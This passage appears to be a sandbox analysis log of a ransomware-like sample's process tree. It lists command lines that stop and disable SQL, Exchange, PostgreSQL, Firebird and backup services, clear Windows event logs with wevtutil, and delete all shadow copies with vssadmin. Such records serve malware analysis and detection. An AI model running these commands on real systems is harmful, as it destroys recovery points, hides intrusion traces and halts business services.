C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%SQL%'" CALL STOPSERVIC3⤵PID:2012
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%Exchange%'" CALL STOPSERVICE2⤵PID:2104
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%Exchange%'" CALL STOPSERVICE3⤵PID:1968
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%wsbex%'" CALL STOPSERVICE2⤵PID:1488
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%wsbex%'" CALL STOPSERVICE3⤵PID:892
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%postgresql%'" CALL STOPSERVICE2⤵PID:2296
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%postgresql%'" CALL STOPSERVICE3⤵PID:2940
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%BACKP%'" CALL STOPSERVICE2⤵PID:2228
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%BACKP%'" CALL STOPSERVICE3⤵PID:2516
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%tomcat%'" CALL STOPSERVICE2⤵PID:2832
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%tomcat%'" CALL STOPSERVICE3⤵PID:2076
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%SharePoint%'" CALL STOPSERVICE2⤵PID:2644
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%SharePoint%'" CALL STOPSERVICE3⤵PID:1496
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%SBS%'" CALL STOPSERVICE2⤵PID:2260
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%SBS%'" CALL STOPSERVICE3⤵PID:1472
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%Firebird%'" CALL ChangeStartMode 'Disabled'2⤵PID:1092
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%Firebird%'" CALL ChangeStartMode 'Disabled'3⤵PID:1976
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%MSSQL%'" CALL ChangeStartMode 'Disabled'2⤵PID:1600
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%MSSQL%'" CALL ChangeStartMode 'Disabled'3⤵PID:440
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%SQL%'" CALL ChangeStartMode 'Disabled'2⤵PID:2080
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%SQL%'" CALL ChangeStartMode 'Disabled'3⤵PID:2876
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%Exchange%'" CALL ChangeStartMode 'Disabled'2⤵PID:1084
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%Exchange%'" CALL ChangeStartMode 'Disabled'3⤵PID:1660
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%wsbex%'" CALL ChangeStartMode 'Disabled'2⤵PID:2788
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%wsbex%'" CALL ChangeStartMode 'Disabled'3⤵PID:2764
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%postgresql%'" CALL ChangeStartMode 'Disabled'2⤵PID:440
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%postgresql%'" CALL ChangeStartMode 'Disabled'3⤵PID:2420
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%BACKP%'" CALL ChangeStartMode 'Disabled'2⤵PID:2788
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%BACKP%'" CALL ChangeStartMode 'Disabled'3⤵PID:2996
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%tomcat%'" CALL ChangeStartMode 'Disabled'2⤵PID:2992
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%tomcat%'" CALL ChangeStartMode 'Disabled'3⤵PID:2748
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%SharePoint%'" CALL ChangeStartMode 'Disabled'2⤵PID:1572
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%SharePoint%'" CALL ChangeStartMode 'Disabled'3⤵PID:2848
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%SBS%'" CALL ChangeStartMode 'Disabled'2⤵PID:2980
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%SBS%'" CALL ChangeStartMode 'Disabled'3⤵PID:892
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config FirebirdServerDefaultInstance start= disabled2⤵PID:1144
-
C:\Windows\SysWOW64\sc.exesc config FirebirdServerDefaultInstance start= disabled3⤵
- Launches sc.exe
PID:1656
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config FirebirdServerDefaultInstance start= disabled2⤵PID:2072
-
C:\Windows\SysWOW64\sc.exesc config FirebirdServerDefaultInstance start= disabled3⤵
- Launches sc.exe
PID:2100
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM fb_inet_server.exe /F2⤵PID:1564
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM fb_inet_server.exe /F3⤵
- Kills process with taskkill
PID:1200
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM fb_inet_server.exe /F2⤵PID:2504
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM fb_inet_server.exe /F3⤵
- Kills process with taskkill
PID:2092
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop FirebirdServerDefaultInstance2⤵PID:1960
-
C:\Windows\SysWOW64\net.exenet stop FirebirdServerDefaultInstance3⤵PID:2164
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FirebirdServerDefaultInstance4⤵PID:1060
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\net1 stop FirebirdServerDefaultInstance2⤵PID:600
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FirebirdServerDefaultInstance3⤵PID:2976
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM sqlservr.exe /F2⤵PID:1528
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlservr.exe /F3⤵
- Kills process with taskkill
PID:1896
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSSQLSERVER start= disabled2⤵PID:2660
-
C:\Windows\SysWOW64\sc.exesc config MSSQLSERVER start= disabled3⤵PID:900
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSSQL$SQLEXPRESS start= disabled2⤵PID:2508
-
C:\Windows\SysWOW64\sc.exesc config MSSQL$SQLEXPRESS start= disabled3⤵
- Launches sc.exe
PID:1756
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSSQLSERVER2⤵PID:1592
-
C:\Windows\SysWOW64\net.exenet stop MSSQLSERVER3⤵PID:2540
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER4⤵PID:2704
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\net1 stop MSSQLSERVER2⤵PID:1080
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER3⤵PID:1140
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSSQL$SQLEXPRESS2⤵PID:2824
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SQLEXPRESS3⤵PID:2004
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS4⤵PID:2768
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSSQL$SQLEXPRESS2⤵PID:2720
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SQLEXPRESS3⤵PID:2564
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS4⤵PID:2580
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS2⤵PID:2112
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS3⤵PID:2608
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM pg_ctl.exe /F2⤵PID:2140
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM pg_ctl.exe /F3⤵
- Kills process with taskkill
PID:2032
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config postgresql-9.0 start= disabled2⤵PID:1680
-
C:\Windows\SysWOW64\sc.exesc config postgresql-9.0 start= disabled3⤵
- Launches sc.exe
PID:2724
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop postgresql-9.02⤵PID:1892
-
C:\Windows\SysWOW64\net.exenet stop postgresql-9.03⤵PID:2728
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop postgresql-9.04⤵PID:3012
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeAB start= disabled2⤵PID:2680
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeAB start= disabled3⤵
- Launches sc.exe
PID:1072
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeAntispamUpdate start= disabled2⤵PID:2476
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeAntispamUpdate start= disabled3⤵PID:1660
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeEdgeSync start= disabled2⤵PID:2040
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeEdgeSync start= disabled3⤵
- Launches sc.exe
PID:3016
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeFDS start= disabled2⤵PID:2012
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeFDS start= disabled3⤵
- Launches sc.exe
PID:2496
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeFBA start= disabled2⤵PID:2968
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeFBA start= disabled3⤵
- Launches sc.exe
PID:2672
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeImap4 start= disabled2⤵PID:1632
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeImap4 start= disabled3⤵
- Launches sc.exe
PID:1864
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeImap4 start= disabled2⤵PID:1576
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeImap4 start= disabled3⤵
- Launches sc.exe
PID:2816
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeIS start= disabled2⤵PID:3056
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeIS start= disabled3⤵
- Launches sc.exe
PID:2648
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeMailSubmission start= disabled2⤵PID:2000
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeMailSubmission start= disabled3⤵PID:2008
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeMailboxAssistants start= disabled2⤵PID:2832
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeMailboxAssistants start= disabled3⤵
- Launches sc.exe
PID:2960
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeMailboxReplication start= disabled2⤵PID:1184
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeMailboxReplication start= disabled3⤵
- Launches sc.exe
PID:2236
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeMonitoring start= disabled2⤵PID:744
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeMonitoring start= disabled3⤵
- Launches sc.exe
PID:1272
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangePop3 start= disabled2⤵PID:1496
-
C:\Windows\SysWOW64\sc.exesc config MSExchangePop3 start= disabled3⤵PID:2212
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeProtectedServiceHost start= disabled2⤵PID:2668
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeProtectedServiceHost start= disabled3⤵PID:1760
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeRPC start= disabled2⤵PID:1684
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeRPC start= disabled3⤵
- Launches sc.exe
PID:2300
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeSearch start= disable2⤵PID:1508
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeSearch start= disable3⤵
- Launches sc.exe
PID:2896
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config wsbexchange start= disabled2⤵PID:2016
-
C:\Windows\SysWOW64\sc.exesc config wsbexchange start= disabled3⤵
- Launches sc.exe
PID:2920
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeSA start= disabled2⤵PID:2348
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeSA start= disabled3⤵
- Launches sc.exe
PID:1596
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeThrottling start= disabled2⤵PID:1808
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeThrottling start= disabled3⤵
- Launches sc.exe
PID:1636
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeTransportLogSearch start= disabled2⤵PID:2024
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeTransportLogSearch start= disabled3⤵
- Launches sc.exe
PID:2164
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSExchangeAB2⤵PID:2416
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeAB3⤵PID:600
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeAB4⤵PID:1440
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSExchangeAntispamUpdate2⤵PID:2664
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeAntispamUpdate3⤵PID:1896
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeAntispamUpdate4⤵PID:2584
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSExchangeEdgeSync2⤵PID:2264
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeEdgeSync3⤵PID:1676
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeEdgeSync4⤵PID:2660
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSExchangeImap42⤵PID:796
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeImap43⤵PID:2908
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeImap44⤵PID:2984
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSExchangeMailboxReplication2⤵PID:2436
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeMailboxReplication3⤵PID:1816
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMailboxReplication4⤵PID:1592
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSExchangeProtectedServiceHost2⤵PID:2492
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeProtectedServiceHost3⤵PID:1080
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeProtectedServiceHost4⤵PID:1764
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil cl Application2⤵PID:2964
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl Application3⤵
- Clears Windows event logs
PID:2824
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil cl security2⤵PID:1604
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl security3⤵
- Clears Windows event logs
PID:2512
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil cl setup2⤵PID:3060
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl setup3⤵
- Clears Windows event logs
PID:2112
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil cl system2⤵PID:3024
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl system3⤵
- Clears Windows event logs
PID:2792
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet2⤵PID:2140
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2532
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%Firebird%'" CALL STOPSERVICE2⤵PID:772
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%Firebird%'" CALL STOPSERVICE3⤵PID:2132
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%Firebird%'" CALL STOPSERVICE2⤵PID:1160
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%Firebird%'" CALL STOPSERVICE3⤵PID:2280
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%MSSQL%'" CALL STOPSERVICE2⤵PID:2352
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%MSSQL%'" CALL STOPSERVICE3⤵PID:1616
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%MSSQL%'" CALL STOPSERVICE2⤵PID:2620
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%MSSQL%'" CALL STOPSERVICE3⤵PID:2156
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%SQL%'" CALL STOPSERVIC2⤵PID:3040
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%SQL%'" CALL STOPSERVIC3⤵PID:2172
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%Exchange%'" CALL STOPSERVICE2⤵PID:776
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%Exchange%'" CALL STOPSERVICE3⤵PID:2484
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%wsbex%'" CALL STOPSERVICE2⤵PID:2956
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%wsbex%'" CALL STOPSERVICE3⤵PID:2756
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%postgresql%'" CALL STOPSERVICE2⤵PID:1212
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%postgresql%'" CALL STOPSERVICE3⤵PID:616
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%BACKP%'" CALL STOPSERVICE2⤵PID:2236
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%BACKP%'" CALL STOPSERVICE3⤵PID:2556
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%tomcat%'" CALL STOPSERVICE2⤵PID:1352
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%tomcat%'" CALL STOPSERVICE3⤵PID:2212
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%SharePoint%'" CALL STOPSERVICE2⤵PID:3048
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%SharePoint%'" CALL STOPSERVICE3⤵PID:2736
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%SBS%'" CALL STOPSERVICE2⤵PID:1572
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%SBS%'" CALL STOPSERVICE3⤵PID:2884
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%Firebird%'" CALL ChangeStartMode 'Disabled'2⤵PID:2920
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%Firebird%'" CALL ChangeStartMode 'Disabled'3⤵PID:1804
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%MSSQL%'" CALL ChangeStartMode 'Disabled'2⤵PID:2100
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%MSSQL%'" CALL ChangeStartMode 'Disabled'3⤵PID:1464
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%SQL%'" CALL ChangeStartMode 'Disabled'2⤵PID:1580
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%SQL%'" CALL ChangeStartMode 'Disabled'3⤵PID:2976
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%Exchange%'" CALL ChangeStartMode 'Disabled'2⤵PID:1476
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%Exchange%'" CALL ChangeStartMode 'Disabled'3⤵PID:1896
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%wsbex%'" CALL ChangeStartMode 'Disabled'2⤵PID:2660
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%wsbex%'" CALL ChangeStartMode 'Disabled'3⤵PID:2344
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%postgresql%'" CALL ChangeStartMode 'Disabled'2⤵PID:1640
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%postgresql%'" CALL ChangeStartMode 'Disabled'3⤵PID:2144
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%BACKP%'" CALL ChangeStartMode 'Disabled'2⤵PID:400
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%BACKP%'" CALL ChangeStartMode 'Disabled'3⤵PID:1404
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%tomcat%'" CALL ChangeStartMode 'Disabled'2⤵PID:2824
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%tomcat%'" CALL ChangeStartMode 'Disabled'3⤵PID:2700
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%SharePoint%'" CALL ChangeStartMode 'Disabled'2⤵PID:2608
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%SharePoint%'" CALL ChangeStartMode 'Disabled'3⤵PID:3060
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%SBS%'" CALL ChangeStartMode 'Disabled'2⤵PID:3024
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%SBS%'" CALL ChangeStartMode 'Disabled'3⤵PID:1912
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config FirebirdServerDefaultInstance start= disabled2⤵PID:2940
-
C:\Windows\SysWOW64\sc.exesc config FirebirdServerDefaultInstance start= disabled3⤵PID:864
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config FirebirdServerDefaultInstance start= disabled2⤵PID:2132
-
C:\Windows\SysWOW64\sc.exesc config FirebirdServerDefaultInstance start= disabled3⤵
- Launches sc.exe
PID:1072
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM fb_inet_server.exe /F2⤵PID:2676
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM fb_inet_server.exe /F3⤵
- Kills process with taskkill
PID:2260
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM fb_inet_server.exe /F2⤵PID:2116
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM fb_inet_server.exe /F3⤵
- Kills process with taskkill
PID:1616
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop FirebirdServerDefaultInstance2⤵PID:1620
-
C:\Windows\SysWOW64\net.exenet stop FirebirdServerDefaultInstance3⤵PID:2068
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FirebirdServerDefaultInstance4⤵PID:2012
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\net1 stop FirebirdServerDefaultInstance2⤵PID:1600
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FirebirdServerDefaultInstance3⤵PID:1864
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM sqlservr.exe /F2⤵PID:2732
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlservr.exe /F3⤵
- Kills process with taskkill
PID:3036
-
-
-
